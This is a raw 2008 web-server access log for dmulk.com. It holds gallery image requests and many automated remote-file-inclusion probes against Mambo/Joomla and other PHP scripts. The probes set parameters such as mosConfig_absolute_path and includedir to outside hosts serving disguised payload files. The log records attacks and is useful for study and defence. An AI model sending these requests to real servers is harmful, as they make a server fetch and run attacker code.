72.199.235.196 - - [20/Sep/2008:10:06:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-109_0.jpg HTTP/1.1" 200 358423 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.88.18.196 - - [20/Sep/2008:10:06:08 -0700] "GET /logs/access_080215.log/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:10:06:08 -0700] "GET /logs/access_080525.log/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:10:06:08 -0700] "GET /logs/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:10:06:10 -0700] "GET /index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92471 "-" "libwww-perl/5.814" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:06:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-017.jpg HTTP/1.1" 200 337700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.91.27.99 - - [20/Sep/2008:10:06:22 -0700] "GET /logs/access_080114.log/playlist.php/db.php?commonpath=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.27.99 - - [20/Sep/2008:10:06:22 -0700] "GET /playlist.php/db.php?commonpath=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.27.99 - - [20/Sep/2008:10:06:22 -0700] "GET /logs/playlist.php/db.php?commonpath=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:10:06:25 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.158 - - [20/Sep/2008:10:06:25 -0700] "GET /logs/access_080401.log HTTP/1.0" 200 2049545 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.227.109.157 - - [20/Sep/2008:10:06:27 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.109.157 - - [20/Sep/2008:10:06:29 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92735 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.109.157 - - [20/Sep/2008:10:06:30 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:06:31 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-236.jpg HTTP/1.1" 200 283303 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:06:32 -0700] "GET /logs/access_080228.log/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:06:33 -0700] "GET /logs/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 65877 "-" "libwww-perl/5.810" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:10:06:33 -0700] "GET /logs/access_080402.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://ratakettu.com/dl/avatar/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:06:33 -0700] "GET /?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 92234 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:06:33 -0700] "GET /logs/access_080312.log/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:10:06:34 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.41.162 - - [20/Sep/2008:10:06:38 -0700] "GET /logs/access_080322.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.41.162 - - [20/Sep/2008:10:06:44 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92686 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:06:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-110_0.jpg HTTP/1.1" 200 404496 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
65.254.41.162 - - [20/Sep/2008:10:06:45 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.41.162 - - [20/Sep/2008:10:06:49 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.91.27.99 - - [20/Sep/2008:10:06:50 -0700] "GET /logs/access_080625.log/playlist.php/db.php?commonpath=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:06:59 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-169.jpg HTTP/1.1" 200 361968 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:07:09 -0700] "GET /logs/access_080817.log%20/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:07:09 -0700] "GET /logs/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 65877 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:07:09 -0700] "GET /?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 92250 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:07:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-055.jpg HTTP/1.1" 200 247455 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:07:14 -0700] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:07:15 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 200 92536 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.208.16.220 - - [20/Sep/2008:10:07:16 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.220 - - [20/Sep/2008:10:07:17 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92689 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.220 - - [20/Sep/2008:10:07:17 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:07:26 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.22.204.48 - - [20/Sep/2008:10:07:31 -0700] "GET /logs/access.log/index2.php?content=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.48 - - [20/Sep/2008:10:07:31 -0700] "GET /logs/index2.php?content=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:07:34 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.16.220 - - [20/Sep/2008:10:07:34 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:07:35 -0700] "GET //index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 92385 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:07:37 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:07:38 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:07:40 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-102_0.jpg HTTP/1.1" 200 485048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:07:40 -0700] "GET //index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 92385 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:07:41 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:07:42 -0700] "GET /logs/access_080228.log/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.109.157 - - [20/Sep/2008:10:07:44 -0700] "GET /logs/access_080711.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:10:07:50 -0700] "GET /logs/access_080122.log/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:07:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-031_1.jpg HTTP/1.1" 200 385379 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
203.22.204.48 - - [20/Sep/2008:10:07:57 -0700] "GET /logs/access_080519.log/index2.php?content=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:08:06 -0700] "GET /logs/access_080525.log/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:08:07 -0700] "GET /logs/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:08:07 -0700] "GET /logs/access_080215.log/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:08:08 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1022.jpg HTTP/1.1" 200 289866 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:08:08 -0700] "GET /index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92471 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:08:09 -0700] "GET /logs/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:08:09 -0700] "GET /logs/access_080215.log/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:08:09 -0700] "GET /logs/access_080525.log/index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:08:10 -0700] "GET /index.php?option=com_mamblog&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92471 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:08:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-090.jpg HTTP/1.1" 200 470626 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.223.100.182 - - [20/Sep/2008:10:08:34 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92716 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:08:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-022_3.jpg HTTP/1.1" 200 292023 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:08:39 -0700] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:08:40 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 92631 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:08:41 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:08:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0030.jpg HTTP/1.1" 200 422859 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:08:58 -0700] "GET /logs/access_080817.log%20/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:09:04 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-013.jpg HTTP/1.1" 200 404805 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:09:05 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:09:06 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:09:14 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:09:16 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.alevichat.com/ids.txt?? HTTP/1.1" 200 92271 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:09:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-052_0.jpg HTTP/1.1" 200 404497 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
212.227.127.179 - - [20/Sep/2008:10:09:21 -0700] "GET /logs/access_080510.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.179 - - [20/Sep/2008:10:09:22 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92690 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.179 - - [20/Sep/2008:10:09:23 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [20/Sep/2008:10:09:27 -0700] "GET /logs/access_080503.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [20/Sep/2008:10:09:28 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92700 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.11 - - [20/Sep/2008:10:09:30 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:09:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-028_1.jpg HTTP/1.1" 200 321368 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
81.176.226.164 - - [20/Sep/2008:10:09:42 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:09:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-083_0.jpg HTTP/1.1" 200 346900 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
89.111.176.11 - - [20/Sep/2008:10:09:57 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:10:00 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-195.jpg HTTP/1.1" 200 323860 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
212.227.127.179 - - [20/Sep/2008:10:10:09 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92690 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:10:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-044_2.jpg HTTP/1.1" 200 465462 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.208.16.220 - - [20/Sep/2008:10:10:16 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92721 "-" "libwww-perl/5.805" "www.dmulk.com"
64.1.215.164 - - [20/Sep/2008:10:10:22 -0700] "GET /logs/access_080329.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:10:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-145.jpg HTTP/1.1" 200 339432 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
212.227.109.157 - - [20/Sep/2008:10:10:41 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92751 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:10:42 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-231.jpg HTTP/1.1" 200 344693 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:10:44 -0700] "GET /logs/access_080525.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:10:44 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:10:47 -0700] "GET /logs/access_080525.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:10:47 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.165.86.7 - - [20/Sep/2008:10:10:48 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.36.144.8 - - [20/Sep/2008:10:10:48 -0700] "GET /logs/access_080327.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "dmulk.com"
213.165.86.7 - - [20/Sep/2008:10:10:49 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92705 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.86.7 - - [20/Sep/2008:10:10:51 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.88.84 - - [20/Sep/2008:10:10:52 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.88.84 - - [20/Sep/2008:10:10:53 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92705 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.88.84 - - [20/Sep/2008:10:10:54 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:10:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-217.jpg HTTP/1.1" 200 458674 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
67.18.151.242 - - [20/Sep/2008:10:10:59 -0700] "GET /logs/access_080307.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
